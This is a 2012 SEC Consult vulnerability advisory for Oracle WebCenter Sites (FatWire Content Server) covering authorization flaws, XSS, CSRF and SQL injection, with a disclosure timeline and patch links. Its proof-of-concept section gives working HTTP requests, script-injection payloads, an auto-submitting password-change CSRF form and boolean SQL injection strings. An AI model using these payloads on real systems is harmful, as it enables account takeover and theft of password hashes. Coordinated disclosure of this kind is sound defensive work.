Oracle WebCenter Sites (AKA FatWire) XSS / SQL Injection / CSRF

`SEC Consult Vulnerability Lab Security Advisory < 20121017-2 >  
=======================================================================  
title: Multiple vulnerabilities in Oracle WebCenter Sites  
product: Oracle WebCenter Sites (former FatWire Content Server)  
vulnerable version: 6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1,  
7.6.2, 11.1.1.6.0  
fixed version: Patch information see sections below  
CVE: CVE-2012-3183 (S0183794)  
CVE-2012-3184 (S0183815)  
CVE-2012-3185 (S0183827)  
CVE-2012-3186 (S0183836)  
impact: High  
homepage: http://www.oracle.com/us/corporate/acquisitions/fatwire/index.html  
found: 21.05.2012  
by: F. Lukavsky   
SEC Consult Vulnerability Lab   
https://www.sec-consult.com  
=======================================================================  
  
Vendor description:  
-------------------  
FatWire Content Server is a predecessor product of Oracle WebCenter Sites.  
  
FatWire Content Server is a software suite that allows you to create and   
manage content to be published on your online site. The content is stored in   
Content Server's database. You create and manipulate the content using Content   
Server's interface, which provides a simple and intuitive way of accessing and   
working with the CS database.  
  
FatWire Content Server 7 - Advanced Interface User's Guide  
<http://docs.oracle.com/cd/E28662_01/doc.76/content_server/cs_user_advanced_76p2.pdf>  
  
  
Vulnerability overview/description:  
-----------------------------------  
1) Authorization Issues  
The backend of the Content Server fails to validate authorization for  
certain requests. This allows low privileged users manipulating data,   
which they are not authorized to.  
  
2) Cross-Site Scripting  
The backend of the Content Server is prone to permanent and reflected   
Cross-Site Scripting attacks. The vulnerability can be used to include   
HTML- or JavaScript code to the affected web page. The code is executed   
in the browser of users if they visit the manipulated site. The   
vulnerability can be used to change the contents of the displayed site,   
redirect to other sites or steal user credentials. Additionally, Portal   
users are potential victims of browser exploits and JavaScript Trojans.   
  
3) Cross-Site Request Forgery  
An attacker can use Cross-Site Request Forgery to perform arbitrary web   
requests with the identity of the victim without being noticed by the   
victim. Although responses to these requests are not delivered to the   
attacker, in many cases it is sufficient to be able to compromise the   
integrity of the victim's information stored on the site or to perform   
certain, possibly compromising requests to other sites.  
  
4) SQL Injection  
Due to insufficient input validation, the backend of FatWire Content   
Server allows the injection of direct SQL commands. By exploiting the   
vulnerability, an attacker gains access to all records stored in the   
database with the privileges of database user CSAUTHORING.  
  
  
Proof of concept:  
-----------------  
  
1) In the user profile, users are given the possibility to change their email   
address. By supplying arbitrary user names, a low privileged user can   
change the email address of other users:  
  
POST /cs/ContentServer HTTP/1.1  
  
_charset_=UTF-8&cs_environment=standard&cs_formmode=WCM&username=<username  
of the target user>&email=<new email  
address>&selectedLocale=None&userid=userid%3D<own user  
id>%2Cou%3DPeople&manageprofile=true&password=&password2=&pagename=OpenMarket%2FXcelerate%2FAdmin%2FUserProfilePost&action=edit  
  
2) The display name of page elements are included unsanitized when viewing   
the element's details. Creating a new image with the following manipulated   
parameter demonstrates this issue:  
  
-----------------------------6083206021221  
Content-Disposition: form-data; name="flexassets:name"  
  
xxx.jsp</script><script>alert(document.location)</script>  
-----------------------------6083206021221  
  
  
Additionally, users can change their email address in the user profile   
management. The email address is included unsanitized when viewing a   
manipulated profile. Furthermore, by combining this issue with the attack   
described in vulnerability (1), the Cross-Site Scripting payload can be   
embedded in the user profile of arbitrary users. The following request   
demonstrates this issue:  
  
POST /cs/ContentServer HTTP/1.1  
  
_charset_=UTF-8&cs_environment=standard&cs_formmode=WCM&username=<username  
of the target user>&email=<manipulated email  
address>%3Cscript%3Ealert%28document.location%29%3C%2Fscript%3E&selectedLocale=None&userid=userid%3D<own  
user  
id>%2Cou%3DPeople&manageprofile=true&password=&password2=&pagename=OpenMarket%2FXcelerate%2FAdmin%2FUserProfilePost&action=edit  
Many parameters are included unsanitized in error messages, which  
leads to reflected Cross-Site Scripting vulnerabilities:  
http://fatwire/cs/ContentServer?username=<script>alert(document.location)</script>&manageprofile=true&action=edit&pagename=OpenMarket%2FXcelerate%2FAdmin%2FUserProfileFront   
http://fatwire/cs/ContentServer?StartItem=1327334935133"><script>alert(document.location)</script>&AssetType=Page&cs_environment=standard&pagename=OpenMarket%2FXcelerate%2FActions%2FNewContentFront&cs_formmode=WCM  
  
These examples raise no claims of being complete.   
  
  
3) A low privileged user can view all available users and their user ids   
when creating a workflow report. When the target user submits the   
following form while being logged in, an attacker can change the   
password of the target user to an arbitrary value:  
  
<html>  
<body onload="document.forms[0].submit()">  
<form action="http://fatwire/cs/ContentServer" method="POST">  
<input type="hidden" name="_charset_" value="UTF-8" />  
<input type="hidden" name="cs_environment"  
value="standard" /> <input type="hidden" name="cs_formmode" value="WCM" />  
<input type="hidden" name="username" value="<target user>" />  
<input type="hidden" name="email" value="" />  
<input type="hidden" name="selectedLocale" value="None" />  
<input type="hidden" name="userid"   
value="userid=<target user id>,ou=People" />  
<input type="hidden" name="modifyPassword" value="on" />  
<input type="hidden" name="manageprofile" value="true" />  
<input type="hidden" name="password" value="<new  
password>" /> <input type="hidden" name="password2" value="<new password>" />  
<input type="hidden" name="pagename"   
value="OpenMarket/Xcelerate/Admin/UserProfilePost" />  
<input type="hidden" name="action" value="edit" />  
</form>  
</body>  
</html>  
  
  
4) The parameter selectedLocale of the user profile management form is   
vulnerable to a SQL Injection vulnerability. The following true comparison   
added to the SQL query results in the locale preference to be set to   
English (United States):  
  
POST /cs/ContentServer HTTP/1.1  
  
_charset_=UTF-8&cs_environment=standard&cs_formmode=WCM&username=user&[email protected]&selectedLocale=None'+or+1%3d1--+&userid=userid%  
3D1327334925026%2Cou%3DPeople&manageprofile=true&pagename=OpenMarket%2FXcelerate%2FAdmin%2FUserProfilePost&action=edit   
The following request with a false comparison being added to the SQL query   
results in the locale preference to be set to no preference:  
  
POST /cs/ContentServer HTTP/1.1  
  
_charset_=UTF-8&cs_environment=standard&cs_formmode=WCM&username=user&[email protected]&selectedLocale=None'+or+1%3d2--+&userid=userid%  
3D1327334925026%2Cou%3DPeople&manageprofile=true&pagename=OpenMarket%2FXcelerate%2FAdmin%2FUserProfilePost&action=edit  
  
Observing these differences, arbitrary data of the database can be   
extracted bitwise. This includes for example the password hashes of other   
Content Server users.  
  
  
Vulnerable / tested versions:  
-----------------------------  
The following installation has been tested: FatWire Content Server 7.6.1  
Hotfix 4  
  
  
The following versions have been supplied by Oracle and are vulnerable too:  
6.1, 6.2, 6.3.x, 7, 7.0.1, 7.0.2, 7.0.3, 7.5, 7.6.1, 7.6.2, 11.1.1.6.0  
  
  
  
Vendor contact timeline:  
------------------------  
2012-06-04: Contacting vendor through [email protected]  
2012-06-07: Initial vendor response - issues will be verified  
2012-06-21: Under investigation / Being fixed in main codeline  
2012-07-24: Issue fixed in main codeline, scheduled for a future CPU  
2012-10-15: Oracle: Advisory and patches will be released on 2012-10-16  
2012-10-16: Oracle releases October 2012 CPU  
2012-10-17: Public release of SEC Consult advisory  
  
  
  
Solution:  
---------  
Apply latest patches, see:  
  
http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html  
https://support.oracle.com/rs?type=doc&id=1477727.1  
  
  
Workaround:  
-----------  
Restrict access to the backend of the FatWire Content Server.  
Do not visit untrusted sites while being logged into the backend of the   
FatWire Content Server.  
Keep the time being logged in as short as possible and do not activate   
the option to stay logged into the backend of the FatWire Content Server.  
  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/en/advisories.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Unternehmensberatung GmbH  
  
Office Vienna  
Mooslackengasse 17  
A-1190 Vienna  
Austria  
  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
https://www.sec-consult.com  
  
EOF F. Lukavsky / @2012  
`